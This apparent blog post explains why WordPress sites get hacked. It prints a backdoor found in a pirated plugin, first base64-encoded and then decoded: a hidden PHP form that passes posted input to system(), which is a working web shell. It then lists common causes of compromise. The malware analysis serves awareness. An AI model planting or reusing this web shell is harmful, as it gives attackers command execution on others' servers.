Why are many wordpress sites being hacked every day?
WordPress hacking nowadays is a common thing. Every day thousands of wordpress sites being hacked due to lack of security implementation, usage of the vulnerable plugins, Server side whole, and for many other reasons. I have seen many wordpress site hack for symlink problems with the server and premium plugin downloaded from null themes sites. For observation, once I downloaded a plugin named Wp-Rocket from the https://null-24.com/ and I saw malicious code was injected into the plugin. The code was like below.
[php] PGZvcm0gYWN0aW9uPSIiIG1ldGhvZD1wb3N0IHN0eWxlPSJkaXNwbGF5Om5vbmUiPgpDb21tYW5kOiA8aW5wdXQgbmFtZT1jb2RlIHR5cGU9dGV4dCBzaXplPTEwMCB2YWx1ZT0iPD9waHAgaWYgKGlzc2V0KCRfUE9TVFsiY29kZSJdKSl7cHJpbnQoc3RyaXBzbGFzaGVzKCRfUE9TVFsiY29kZSJdKSk7fSA/PiI+CjxpbnB1dCB0eXBlPXN1Ym1pdD4KPC9mb3JtPgo8cHJlPgo8P3BocCBpZiAoaXNzZXQoJF9QT1NUWyJjb2RlIl0pKXtzeXN0ZW0oc3RyaXBzbGFzaGVzKCRfUE9TVFsiY29kZSJdKS4iIDI+JjEiKTt9ID8+CjwvcHJlPg== [/php]
It was base64 encoded. So who has no programming knowledge will not understand it and the file name was config.php so that people will think it is the configuration file for the plugin. But how much dangerous it was you will understand after decoding it. I used a site to decode the encoded codes, the site URL is https://www.base64decode.org/. You can use many other tools or programs or sites by searching on google. So, let’s see what it shows after decoding.
Server destroying php script
[php] <form action="" method=post style="display:none"> Command: <input name=code type=text size=100 value="<?php if (isset($_POST["code"])){print(stripslashes($_POST["code"]));} ?>"> <input type=submit> </form> <pre> <?php if (isset($_POST["code"])){system(stripslashes($_POST["code"])." 2>&1");} ?> </pre> [/php]
So this was a hidden form with the plugin. Also, there were many other files. So after the installation of the plugin, the hacker will get an email automatic with a user name and password hash from the database. Also, they will get the installation site URL. Only the installation site URL is enough to hack the site by using the above code.
So, here I am giving a list of possible hacking reasons of the wordpress site.
Common hacking reasons of the wordpress site
#1. Using vulnerable licensed premium plugin without code security test from an unauthorized source like null-24.com.
#2. Backdated wordpress version ( using exploits ).
#3. Vulnerable theme ( Like without proper input escape and sanitization ), generally developed by new coders and non-conscious developers.
#4. Easy password for login to the dashboard.
#5. Lack of proper file permission of server.
#6. Vulnerable server.
#7. Symlink problem with the server.
#8. Any configuration file upload to server, search as .git configuration files if the .git repo is public, or any text file stored credentials.
#9. If you save your login password in browser and your computer browser compromised.
#10. If you use any compromised pc and log in to your account using that PC.
#11. If you use any password manager and then if it compromised.
#12. Share dashboard or cpanel or hosting dashboard login credentials through any electronic media.
#13. Using any un-trusted password manager.
#14. If you shared the credentials with someone trusted but his account becomes compromised. So be careful about this. If you are not safe if your account is secured but re-think again about the account with whom you are sharing. My suggestion is to share usernames in a medium like skype and share passwords with the help of other media like messenger or email and site URL through other media. So any account becomes compromised the hacker will not able to understand the login URL and where to use the password.
If you want to know how to protect your wordpress site from being hacked then visit this URL below.
How to secure wordpress and ensure security to prevent wordpress from getting hacked?